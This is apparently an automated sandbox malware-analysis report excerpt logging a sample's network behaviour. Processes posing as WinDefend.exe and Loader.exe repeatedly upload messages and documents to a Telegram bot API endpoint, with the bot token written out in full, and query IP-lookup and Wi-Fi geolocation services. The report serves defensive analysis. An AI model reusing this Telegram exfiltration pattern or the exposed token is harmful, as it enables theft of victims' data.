Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 251Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7ab0b122-2d0a-454c-9cd6-27f316b345b7"Host: api.telegram.orgContent-Length: 2251Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f5e282c-36db-45f4-92a4-ce4ac209ceb7"Host: api.telegram.orgContent-Length: 52104Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="64f452c2-59cc-48cb-9907-2fbcdbdb6917"Host: api.telegram.orgContent-Length: 30376Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 230Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b6ac085b-b0e5-487e-b9f7-fafc3df76db9"Host: api.telegram.orgContent-Length: 1531Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c4b3654f-6b19-4d85-9f54-8ddd111b40e6"Host: api.telegram.orgContent-Length: 10675Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="bf45d7d5-cdaa-4bf3-96de-598d21fd0bcb"Host: api.telegram.orgContent-Length: 79559Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 229Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6317a6f4-f9a6-4639-b805-73f0b2836928"Host: api.telegram.orgContent-Length: 4359Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="adbbb210-efe3-4ce1-a332-776add664964"Host: api.telegram.orgContent-Length: 8060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a792a574-c062-4494-a9a0-0321e9c28bf8"Host: api.telegram.orgContent-Length: 332197Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 226Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e00c1ca2-72ac-4840-9ced-6bd7ad730a7f"Host: api.telegram.orgContent-Length: 12617Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 240Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7f7063b9-486e-4359-8822-8a223dc91761"Host: api.telegram.orgContent-Length: 11429Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="01cdfa1e-89f4-4d27-a799-97624c5d11c9"Host: api.telegram.orgContent-Length: 1464Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="dba1e0a7-3a5a-42f1-ae51-01bbdb95286f"Host: api.telegram.orgContent-Length: 26930Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="275f3aec-ca8f-4ace-88d4-794afa455f8a"Host: api.telegram.orgContent-Length: 21235Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="cdf1892d-44ac-4fbd-bfb5-688fedbe445c"Host: api.telegram.orgContent-Length: 1821Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b7e61f92-a196-4212-b075-a2088c6c54ad"Host: api.telegram.orgContent-Length: 2326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 246Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="02751a0b-43a0-4228-b250-5c660c3e58ca"Host: api.telegram.orgContent-Length: 1553Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="04dab5fe-5091-494a-add1-e55b3a57bacb"Host: api.telegram.orgContent-Length: 59057Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1871a4ec-2cfd-4f86-a94b-62a3a4f2a9f1"Host: api.telegram.orgContent-Length: 44784Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 204Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9fdd44d1-095a-4d58-b4c3-0c52decf4d65"Host: api.telegram.orgContent-Length: 4887Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9efd76a0-7ba4-4af0-a6aa-28899ddd0f85"Host: api.telegram.orgContent-Length: 672Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="004aaa9b-31de-413b-be07-2538580bcce4"Host: api.telegram.orgContent-Length: 319894Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 348Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 208Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e0df5263-6b9a-466f-a257-99d5fc14a0f2"Host: api.telegram.orgContent-Length: 1229Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="578eee22-8a09-41b4-89b2-60ecaf03bffa"Host: api.telegram.orgContent-Length: 934Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="593636b9-6ab3-4b39-b64c-0c606f68b8ae"Host: api.telegram.orgContent-Length: 262934Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="abd7000b-0fa8-45e1-b558-b29acd39828d"Host: api.telegram.orgContent-Length: 1404Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f8451159-dc44-4a7a-aa25-3a00ea09d03e"Host: api.telegram.orgContent-Length: 600Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7e71501f-f78e-4e8b-b204-7cf7606d7793"Host: api.telegram.orgContent-Length: 42190Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 196Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="1f289f73-e1c8-4805-a304-af7c9691fe3d"Host: api.telegram.orgContent-Length: 1548Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d80e067b-6bdb-4762-b126-95d60933b193"Host: api.telegram.orgContent-Length: 893Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: api64.ipify.org
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242
Source: unknown	TCP traffic detected without corresponding DNS query: 66.235.168.242

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com

Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 81.189.14.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org

Source: unknown

Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org0
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: WinDefend.exe, 00000004.00000002.3430651015.000000000B845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000030.00000002.2300634583.0000013E8BBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.21.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Loader.exe, 00000014.00000002.2747981173.000000001B58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
Source: Loaader.exe, 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab6
Source: Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89n
Source: Loader.exe, 00000014.00000002.2521881734.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ene089
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
